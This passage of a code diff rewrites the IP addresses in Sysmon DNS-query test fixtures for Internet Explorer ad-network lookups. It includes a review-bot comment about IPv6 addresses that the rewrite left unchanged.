ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.821\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003essum-sec.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ssum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:23.52.162.21;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029358900Z'/\u003e\u003cEventRecordID\u003e94\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.821\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003essum-sec.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ssum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -1447,7 +1447,7 @@ "ProcessId": "2736", "QueryName": "ssum-sec.casalemedia.com", "QueryStatus": "0", - "QueryResults": "type: 5 ssum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:23.52.162.21;" + "QueryResults": "type: 5 ssum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:89.160.20.156;" }, "level": "information", "process": { 
@@ -1467,7 +1467,7 @@ { "@timestamp": "2021-05-05T15:30:51.696Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029369500Z'/\u003e\u003cEventRecordID\u003e95\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.828\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprotected-by.clarium.io\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 adserver-clarium-446793891.us-east-1.elb.amazonaws.com;::ffff:18.204.130.216;::ffff:18.209.246.43;::ffff:107.23.153.61;::ffff:18.235.141.27;::ffff:3.210.79.248;::ffff:18.209.146.43;::ffff:18.210.64.206;::ffff:18.214.161.226;192.5.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029369500Z'/\u003e\u003cEventRecordID\u003e95\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.828\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprotected-by.clarium.io\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 adserver-clarium-446793891.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" 
@@ -1491,7 +1491,7 @@ "ProcessId": "2736", "QueryName": "protected-by.clarium.io", "QueryStatus": "0", - "QueryResults": "type: 5 adserver-clarium-446793891.us-east-1.elb.amazonaws.com;::ffff:18.204.130.216;::ffff:18.209.246.43;::ffff:107.23.153.61;::ffff:18.235.141.27;::ffff:3.210.79.248;::ffff:18.209.146.43;::ffff:18.210.64.206;::ffff:18.214.161.226;192.5.6.30;2001:503:a83e::2:30;", + "QueryResults": "type: 5 adserver-clarium-446793891.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "process": { 
@@ -1509,7 +1509,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029379000Z'/\u003e\u003cEventRecordID\u003e96\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.838\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epagead2.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:172.217.10.66;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029379000Z'/\u003e\u003cEventRecordID\u003e96\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.838\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epagead2.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -1534,7 +1534,7 @@ "ProcessId": "2736", "QueryName": "pagead2.googlesyndication.com", "QueryStatus": "0", - "QueryResults": "type: 5 pagead46.l.doubleclick.net;::ffff:172.217.10.66;", + "QueryResults": "type: 5 pagead46.l.doubleclick.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "process": { 
@@ -1554,7 +1554,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029388500Z'/\u003e\u003cEventRecordID\u003e97\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.839\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egoogleads.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:172.217.10.66;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029388500Z'/\u003e\u003cEventRecordID\u003e97\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.839\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egoogleads.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "process": { @@ -1583,7 +1583,7 @@ "ProcessId": "2736", "QueryName": "googleads.g.doubleclick.net", "QueryStatus": "0", - "QueryResults": "type: 5 pagead46.l.doubleclick.net;::ffff:172.217.10.66;" + "QueryResults": "type: 5 pagead46.l.doubleclick.net;::ffff:89.160.20.156;" } } }, 
@@ -1593,7 +1593,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029398800Z'/\u003e\u003cEventRecordID\u003e98\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.841\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prod.ups-adcom.aolp-ds-prd.aws.oath.cloud;type: 5 prod.ups-us-east-1.aolp-ds-prd.aws.oath.cloud;::ffff:52.22.184.73;::ffff:54.152.30.174;::ffff:3.213.70.197;::ffff:54.158.57.141;::ffff:52.6.39.34;::ffff:52.0.113.251;::ffff:3.213.8.28;::ffff:3.215.246.105;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029398800Z'/\u003e\u003cEventRecordID\u003e98\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.841\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prod.ups-adcom.aolp-ds-prd.aws.oath.cloud;type: 5 prod.ups-us-east-1.aolp-ds-prd.aws.oath.cloud;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -1609,7 +1609,7 @@
 "ProcessId": "2736",
 "QueryName": "pixel.advertising.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 prod.ups-adcom.aolp-ds-prd.aws.oath.cloud;type: 5 prod.ups-us-east-1.aolp-ds-prd.aws.oath.cloud;::ffff:52.22.184.73;::ffff:54.152.30.174;::ffff:3.213.70.197;::ffff:54.158.57.141;::ffff:52.6.39.34;::ffff:52.0.113.251;::ffff:3.213.8.28;::ffff:3.215.246.105;",
+ "QueryResults": "type: 5 prod.ups-adcom.aolp-ds-prd.aws.oath.cloud;type: 5 prod.ups-us-east-1.aolp-ds-prd.aws.oath.cloud;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:02.841"
 },
@@ -1635,7 +1635,7 @@
 "event_data": {
 "QueryName": "onevideosync.uplynk.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 uplynk.adaptv.advertising.com;type: 5 uplynk-geo.adap.tv;type: 5 uplynk-beacon-newvpc-1603485991.us-east-1.elb.amazonaws.com;::ffff:54.210.214.197;::ffff:52.202.202.147;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;",
+ "QueryResults": "type: 5 uplynk.adaptv.advertising.com;type: 5 uplynk-geo.adap.tv;type: 5 uplynk-beacon-newvpc-1603485991.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:02.844",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
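Review bot: In the rewritten QueryResults of hunk @@ -1635 the IPv6 answers (`2001:503:a83e::2:30` and, in later hunks, `2001:503:231d::2:30`, `2001:503:83eb::30`, `2001:500:856e::30`, `2001:502:1ca1::30`) are left as real public addresses while every IPv4 answer was moved to `89.160.20.156` or a `192.168.0.0/16` address; if the intent stated in the changelog ("test public IPs to the supported subset") is meant to cover all public addresses in fixtures, these should be rewritten as well, to whatever IPv6 range the test enrichment data covers or to the documentation prefix `2001:db8::/32`. The same inconsistency is present in hunks @@ -1664, @@ -1798, @@ -1821, @@ -1837, @@ -1864, @@ -1927, @@ -1955 and @@ -1978. Replacing eight distinct A records with eight copies of `89.160.20.156` also turns the multi-answer case into a single-address case; if the pipeline dedupes resolved addresses into a list field, the expected value of that field presumably changes too, which is not visible in these hunks.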
@@ -1664,7 +1664,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029408600Z'/\u003e\u003cEventRecordID\u003e99\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.844\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eonevideosync.uplynk.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 uplynk.adaptv.advertising.com;type: 5 uplynk-geo.adap.tv;type: 5 uplynk-beacon-newvpc-1603485991.us-east-1.elb.amazonaws.com;::ffff:54.210.214.197;::ffff:52.202.202.147;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029408600Z'/\u003e\u003cEventRecordID\u003e99\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.844\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eonevideosync.uplynk.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 uplynk.adaptv.advertising.com;type: 5 uplynk-geo.adap.tv;type: 5 uplynk-beacon-newvpc-1603485991.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "log": { 
@@ -1717,7 +1717,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029416700Z'/\u003e\u003cEventRecordID\u003e100\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.956\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ead.turn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ad.turn.com.akadns.net;::ffff:50.116.194.21;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
